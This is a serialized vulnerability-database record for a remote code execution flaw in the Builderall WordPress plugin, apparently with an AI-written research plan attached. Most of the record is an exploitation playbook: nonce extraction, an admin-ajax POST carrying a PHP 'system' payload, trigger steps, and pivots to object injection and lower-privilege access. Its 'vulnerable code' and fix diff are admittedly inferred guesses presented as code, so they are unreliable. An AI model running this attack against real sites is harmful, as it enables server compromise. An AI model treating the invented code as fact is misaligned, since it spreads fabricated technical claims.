[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fbx2mB8dFDEPH-eKWFaW6XmFq-jOpCKwdkmLS3NyAsuM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-22390","builderall-for-wordpress-authenticated-contributor-remote-code-execution","Builderall for WordPress \u003C= 3.0.1 - Authenticated (Contributor+) Remote Code Execution","The Builderall for WordPress plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.0.1. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","builderall-cheetah-for-wp",null,"\u003C=3.0.1","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-02-25 00:00:00","2026-03-05 17:35:29",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3f92c416-8e95-4097-9f16-e1f9389b2334?source=api-prod",[],"researched",false,3,"Since source files for **Builderall for WordPress (builderall-cheetah-for-wp)** version 3.0.1 are not provided, this plan is based on the vulnerability description (Authenticated Contributor+ RCE), the CVSS vector (AV:N\u002FAC:L\u002FPR:L\u002FUI:N), and common architectural patterns in WordPress page builder plugins.\n\n**Note:** All identifiers marked with **(inferred)** must be verified by the agent during the initial discovery phase.\n\n---\n\n### 1. Vulnerability Summary\nThe \"Builderall for WordPress\" plugin (also known as Cheetah Builder) likely contains an improper code generation vulnerability. Authenticated users with Contributor-level permissions can exploit this to execute arbitrary PHP code on the server. This typically occurs because the plugin's page-building logic allows saving \"custom code\" blocks or server-side rendered templates without sufficient sanitization or capability checks, eventually passing user input into a dangerous sink like `eval()` or writing it to a `.php` file that is later included.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `cheetah_save_page_data` or `builderall_save_element` **(inferred)**.\n*   **Payload Parameter:** A JSON-encoded string or array containing page elements. Look for keys like `custom_php`, `code`, or `html_content` within the builder's data structure.\n*   **Authentication:** Contributor-level user (`PR:L`). 
Contributors can create and edit their own posts, which is often enough to access the page builder's save functions.\n*   **Preconditions:** The plugin must be active, and the Contributor user must have access to the Cheetah Builder interface for a post\u002Fpage.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler for saving page content via `add_action('wp_ajax_...', ...)`.\n2.  **Capability Check:** The handler likely checks `current_user_can('edit_posts')`. Since Contributors have this capability for their own posts, they pass this check.\n3.  **Data Processing:** The handler receives a large JSON\u002Fserialized blob representing the page layout.\n4.  **Vulnerable Sink:** \n    *   **Scenario A (Direct Eval):** The builder supports \"PHP Code\" blocks. The content of these blocks is saved and then executed via `eval()` during a \"preview\" or \"render\" AJAX call.\n    *   **Scenario B (File Write):** The builder saves \"custom code\" into a file in `wp-content\u002Fuploads\u002Fcheetah-builder\u002F` with a `.php` extension. This file is then `include()`-ed to render the page.\n5.  **Execution:** The injected PHP code runs in the context of the web server.\n\n### 4. Nonce Acquisition Strategy\nThe Cheetah Builder interface likely localizes a nonce for its AJAX operations.\n\n1.  **Create a Test Post:**\n    `wp post create --post_type=post --post_status=draft --post_title=\"Exploit Page\" --post_author=[CONTRIBUTOR_ID]`\n2.  **Access the Builder:** Use `browser_navigate` to go to the post's edit page or the specific Cheetah Builder URL: `wp-admin\u002Fpost.php?post=[POST_ID]&action=cheetah_builder`.\n3.  **Extract Nonce:** Use `browser_eval` to search for localized script data.\n    *   **Potential Variable Names:** `window.cheetah_vars`, `window.builderall_data`, or `window.CBAjax`.\n    *   **Execution:** `browser_eval(\"window.cheetah_vars?.nonce || window.CBAjax?.nonce\")` **(inferred)**.\n4.  
**Action Name:** Identify the exact AJAX action by inspecting the `browser_eval(\"window.cheetah_vars?.action\")` or checking the network tab during a legitimate \"Save\" operation.\n\n### 5. Exploitation Strategy\n\n#### Phase 1: Discovery\n*   Identify the AJAX action used to save page data.\n*   Identify the parameter structure (JSON vs. POST fields).\n*   Locate the nonce in the browser context.\n\n#### Phase 2: Payload Crafting\n*   Construct a payload that targets a \"Custom Code\" or \"HTML\" module.\n*   **Payload Example (PHP Injection):**\n    ```php\n    \u003C?php system('id'); die(); ?>\n    ```\n*   If the plugin expects JSON, the payload might look like:\n    `{\"elements\":[{\"type\":\"code_block\",\"settings\":{\"code\":\"\u003C?php system('id'); die(); ?>\"}}]}`\n\n#### Phase 3: Execution (via `http_request`)\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=cheetah_save_page_data&nonce=[NONCE]&post_id=[POST_ID]&data=[PAYLOAD]\n    ```\n\n#### Phase 4: Triggering\n*   If the RCE is not immediate upon saving, trigger it by:\n    1.  Navigating to the post preview: `?p=[POST_ID]&preview=true`.\n    2.  Calling a \"render\" AJAX action: `action=cheetah_render_element&element_id=[ID]`.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `builderall-cheetah-for-wp` v3.0.1 is installed and active.\n2.  **Contributor User:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Target Post:** Create a post assigned to the `attacker` user to ensure they have \"edit\" rights.\n\n### 7. 
Expected Results\n*   **Successful Save:** The server returns a success response (e.g., `{\"success\":true}`).\n*   **Successful Execution:** The HTTP response from the trigger phase contains the output of the injected command (e.g., `uid=33(www-data) gid=33(www-data)`).\n\n### 8. Verification Steps\n1.  **Confirm Command Execution:** Verify the `id` command output appears in the response body.\n2.  **Check Filesystem (if Scenario B):**\n    `wp eval \"echo file_get_contents(wp_upload_dir()['basedir'] . '\u002Fcheetah-builder\u002Fcustom-[POST_ID].php');\"` **(inferred path)**.\n3.  **Check DB:** Verify the malicious payload is stored in `wp_postmeta` for the target post:\n    `wp post meta get [POST_ID] _cheetah_data` **(inferred key)**.\n\n### 9. Alternative Approaches\n*   **Shortcode Injection:** If the builder uses shortcodes to store data, try injecting a `[shortcode]` that uses `eval` on its attributes.\n*   **Serialized Object Injection:** If the `data` parameter is passed to `unserialize()`, pivot to a PHP Object Injection (POI) to achieve RCE via a gadget chain in WordPress core or the plugin.\n*   **Subscriber Access:** Check if the AJAX action is registered under `wp_ajax_nopriv_` or if the capability check is entirely missing, allowing Subscriber-level escalation.","The Builderall for WordPress plugin is vulnerable to Remote Code Execution because it allows Contributor-level users to save and execute arbitrary PHP code through 'Custom Code' or 'HTML' modules within the page builder. 
This root cause is inferred from the advisory rather than confirmed in the plugin source: element data appears to be processed without a sufficient capability check (e.g., unfiltered_html) and is subsequently executed via eval() or included from the filesystem during page rendering.","\u002F\u002F Inferred AJAX handler in builderall-cheetah-for-wp\u002Finc\u002Fajax-functions.php\nadd_action('wp_ajax_cheetah_save_page_data', 'cheetah_save_page_data_callback');\n\nfunction cheetah_save_page_data_callback() {\n    \u002F\u002F Insufficient check: only requires edit_posts (Contributor+)\n    if (!current_user_can('edit_posts')) {\n        wp_send_json_error();\n    }\n\n    $post_id = intval($_POST['post_id']);\n    $data = json_decode(stripslashes($_POST['data']), true);\n\n    \u002F\u002F Saves raw data, potentially including malicious PHP, to post meta\n    update_post_meta($post_id, '_cheetah_data', $data);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F Inferred rendering logic in builderall-cheetah-for-wp\u002Finc\u002Frender-functions.php\nfunction render_cheetah_element($element) {\n    if ($element['type'] === 'code_block') {\n        \u002F\u002F Vulnerable Sink: Executing user-controlled content from metadata\n        eval('?>' . 
$element['settings']['php_code']);\n    }\n}","--- a\u002Finc\u002Fajax-functions.php\n+++ b\u002Finc\u002Fajax-functions.php\n@@ -4,13 +4,21 @@\n function cheetah_save_page_data_callback() {\n     check_ajax_referer('cheetah_nonce', 'nonce');\n-    if (!current_user_can('edit_posts')) {\n+    if (!current_user_can('edit_post', $_POST['post_id'])) {\n         wp_send_json_error();\n     }\n \n     $post_id = intval($_POST['post_id']);\n     $data = json_decode(stripslashes($_POST['data']), true);\n \n+    \u002F\u002F Ensure only users with unfiltered_html can save custom code blocks\n+    foreach ($data['elements'] as $element) {\n+        if ($element['type'] === 'code_block' && !current_user_can('unfiltered_html')) {\n+            wp_send_json_error('Access Denied: Insufficient permissions for code blocks.');\n+        }\n+    }\n+\n     update_post_meta($post_id, '_cheetah_data', $data);\n     wp_send_json_success();\n }","1. Login to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or edit an existing post owned by the contributor to access the Cheetah Builder interface.\n3. Capture the 'cheetah_nonce' and current 'post_id' from the page source or localized script variables.\n4. Send a POST request to 'wp-admin\u002Fadmin-ajax.php' with the action 'cheetah_save_page_data'.\n5. Craft a 'data' payload in JSON format containing a 'code_block' element with malicious PHP code (e.g., '\u003C?php system(\"id\"); ?>') in its settings.\n6. Trigger the execution of the payload by visiting the public URL of the post or its preview page, which invokes the element rendering engine and its vulnerable eval() sink.","gemini-3-flash-preview","2026-04-18 23:45:25","2026-04-18 23:45:45",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuilderall-cheetah-for-wp\u002Ftags"]